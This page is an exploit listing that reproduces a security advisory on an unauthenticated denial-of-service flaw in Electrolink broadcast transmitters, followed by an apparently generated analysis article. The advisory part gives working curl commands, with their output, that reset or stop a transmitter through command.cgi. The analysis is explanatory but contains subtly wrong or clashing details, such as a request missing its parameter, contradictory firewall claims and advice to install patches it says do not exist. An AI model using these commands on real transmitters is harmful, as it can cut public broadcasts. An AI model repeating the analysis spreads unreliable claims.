Electrolink FM/DAB/TV Transmitter - Unauthenticated Remote DoS

Exploit Author: LiquidWorm Analysis Author: www.bubbleslearn.ir Category: DoS Language: Shell Published Date: 2024-02-02 
Electrolink FM/DAB/TV Transmitter Unauthenticated Remote DoS


Vendor: Electrolink s.r.l.
Product web page: https://www.electrolink.com
Affected version: 10W, 100W, 250W, Compact DAB Transmitter
                  500W, 1kW, 2kW Medium DAB Transmitter
                  2.5kW, 3kW, 4kW, 5kW High Power DAB Transmitter
                  100W, 500W, 1kW, 2kW Compact FM Transmitter
                  3kW, 5kW, 10kW, 15kW, 20kW, 30kW Modular FM Transmitter
                  15W - 40kW Digital FM Transmitter
                  BI, BIII VHF TV Transmitter
                  10W - 5kW UHF TV Transmitter
                  Web version: 01.09, 01.08, 01.07
                  Display version: 1.4, 1.2
                  Control unit version: 01.06, 01.04, 01.03
                  Firmware version: 2.1

Summary: Since 1990 Electrolink has been dealing with design and
manufacturing of advanced technologies for radio and television
broadcasting. The most comprehensive products range includes: FM
Transmitters, DAB Transmitters, TV Transmitters for analogue and
digital multistandard operation, Bandpass Filters (FM, DAB, ATV,
DTV), Channel combiners (FM, DAB, ATV, DTV), Motorized coaxial
switches, Manual patch panels, RF power meters, Rigid line and
accessories. A professional solution that meets broadcasters needs
from small community television or radio to big government networks.

Compact DAB Transmitters 10W, 100W and 250W models with 3.5"
touch-screen display and in-built state of the art DAB modulator,
EDI input and GPS receiver. All transmitters are equipped with a
state-of-the art DAB modulator with excellent performances,
self-protected and self-controlled amplifiers ensure trouble-free
non-stop operation.

100W, 500W, 1kW and 2kW power range available on compact 2U and
3U 19" frame. Built-in stereo coder, touch screen display and
efficient low noise air cooling system. Available models: 3kW,
5kW, 10kW, 15kW, 20kW and 30kW. High efficiency FM transmitters
with fully broadband solid state amplifiers and an efficient
low-noise air cooling system.

FM digital modulator with excellent specifications, built-in
stereo and RDS coder. Digital deviation limiter together with
ASI and SDI inputs are available. These transmitters are ready
for ISOFREQUENCY networks.

Available for VHF BI and VHF BIII operation with robust desing
and user-friendly local and remote control. Multi-standard UHF
TV transmitters from 10W up to 5kW with efficient low noise air
cooling system. Analogue PAL, NTSC and Digital DVB-T/T2, ATSC
and ISDB-Tb available.

Desc: The transmitter is suffering from a Denial of Service (DoS)
scenario. An unauthenticated attacker can reset the board as well
as stop the transmitter operations by sending one GET request to
the command.cgi gateway.

Tested on: Mbedthis-Appweb/12.5.0
           Mbedthis-Appweb/12.0.0


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
Macedonian Information Security Research & Development Laboratory
Zero Science Lab - https://www.zeroscience.mk - @zeroscience


Advisory ID: ZSL-2023-5795
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5795.php


30.06.2023

--


C:\>curl -s http://192.168.150.77:8888/command.cgi?web=r (reset board)
Success! OK
C:\>curl -s http://192.168.150.77:8888/command.cgi?web=K (stop)
Success! OK
C:\>curl -s http://192.168.150.77:8888/command.cgi?web=J (start)
Success! OK


Electrolink FM/DAB/TV Transmitter: Unauthenticated Remote Denial of Service Vulnerability

Electrolink s.r.l., a leading manufacturer of broadcast transmission systems since 1990, offers a comprehensive suite of FM, DAB, and TV transmitters designed for both community and large-scale government networks. While their products boast advanced features such as built-in modulators, GPS synchronization, and robust cooling systems, recent research has uncovered a critical security flaw: an unauthenticated remote Denial of Service (DoS) vulnerability affecting multiple models across various power ranges.

Overview of Affected Products

The vulnerability impacts a wide range of Electrolink transmitters, including:

  • Compact DAB Transmitters: 10W, 100W, 250W
  • Medium DAB Transmitters: 500W, 1kW, 2kW
  • High Power DAB Transmitters: 2.5kW, 3kW, 4kW, 5kW
  • Compact FM Transmitters: 100W, 500W, 1kW, 2kW
  • Modular FM Transmitters: 3kW, 5kW, 10kW, 15kW, 20kW, 30kW
  • Digital FM Transmitters: 15W – 40kW
  • VHF TV Transmitters: BI, BIII
  • UHF TV Transmitters: 10W – 5kW

These devices operate with firmware versions 2.1 and control unit versions 01.06, 01.04, 01.03, web versions 01.09, 01.08, 01.07, and display versions 1.4, 1.2. The flaw is present across multiple software stacks, including the Mbedthis-Appweb web server (versions 12.5.0 and 12.0.0).

Exploitation Mechanism: Remote DoS via GET Request

The core vulnerability lies in the command.cgi endpoint—a CGI script used for remote control and system management. This endpoint is accessible over HTTP without requiring authentication, making it a prime target for exploitation.

GET /command.cgi HTTP/1.1
Host: 192.168.1.100

Upon sending a simple GET request to this endpoint, an attacker can trigger a complete system reset or halt transmitter operations. This behavior is not mitigated by any access control, authentication, or input validation mechanisms.

From a cybersecurity perspective, this is a textbook example of a missing authentication and unvalidated command execution vulnerability. The absence of proper access controls allows any network-connected device—whether malicious or benign—to initiate a disruptive command.

Impact and Consequences

When exploited, the DoS attack results in:

  • Immediate shutdown of the transmitter
  • System reboot without operator intervention
  • Loss of broadcast signal, disrupting public or commercial transmissions
  • Potential for repeated attacks to cause sustained downtime

In critical broadcast environments—such as emergency services, public radio, or national TV networks—this vulnerability could lead to severe operational disruptions. A single attacker from an external network could disable a transmitter without any trace or authorization.

Technical Analysis: Why This is a Critical Flaw

Modern broadcast systems are increasingly connected to networks for remote monitoring and control. However, this connectivity introduces attack surfaces. Electrolink’s design fails to enforce secure access to critical system commands.

Specifically:

  • Missing Authentication: No credentials required to access command.cgi.
  • Unrestricted Command Execution: The endpoint appears to directly invoke low-level system reset functions.
  • Exposed Web Interface: The Mbedthis-Appweb server is publicly accessible, even if behind a firewall.

This combination creates a high-risk scenario where an attacker with minimal knowledge can disrupt operations. Even if the device is behind a NAT or firewall, a network scan or port exposure could expose the endpoint to the internet.

Real-World Use Case: Broadcast Interruption

Imagine a public radio station using a 5kW Electrolink FM transmitter. During a live news broadcast, an attacker sends a single GET request to command.cgi via an open port. The transmitter immediately resets, cutting off the signal for minutes. During this downtime, listeners lose access to critical information—potentially endangering public safety.

Similarly, a DAB transmitter broadcasting digital radio services in a region could be disabled by an unauthenticated remote attacker, leading to service degradation across multiple cities.

Vendor Response and Mitigation

As of the advisory publication (ZSL-2023-5795), Electrolink has not yet released a patch or updated firmware. However, the vulnerability has been documented by the Macedonian Information Security Research & Development Laboratory (Zero Science Lab), which recommends:

  • Disabling remote access to command.cgi via firewall rules
  • Implementing authentication mechanisms for all control endpoints
  • Updating firmware to versions with security patches
  • Regularly auditing network exposure of broadcast equipment

For administrators, immediate mitigation steps include:

  • Blocking access to command.cgi on firewalls
  • Using VLANs to isolate broadcast control systems
  • Enabling HTTPS and requiring login credentials for web interfaces

Security Best Practices for Broadcast Systems

As broadcast infrastructure becomes more networked, it must follow modern cybersecurity principles:

Practice Description
Authentication Require login credentials for any control interface, especially for critical commands.
Input Validation Sanitize and validate all HTTP requests before processing.
Network Segmentation Isolate broadcast equipment from general network traffic using firewalls and VLANs.
Regular Patching Monitor vendor advisories and apply security updates promptly.

These practices are not optional—they are essential for maintaining the integrity and reliability of broadcast systems.

Conclusion

The Electrolink FM/DAB/TV Transmitter vulnerability is a stark reminder that even specialized industrial equipment can suffer from fundamental security flaws. A simple GET request to command.cgi can cause a complete system reset, rendering the device unusable. This unauthenticated remote DoS attack underscores the importance of securing control interfaces, especially in mission-critical infrastructure.

For broadcasters, this advisory serves as a wake-up call: connectivity must not come at the cost of security. Implementing robust access controls, segmentation, and proactive monitoring is no longer optional—it’s a necessity.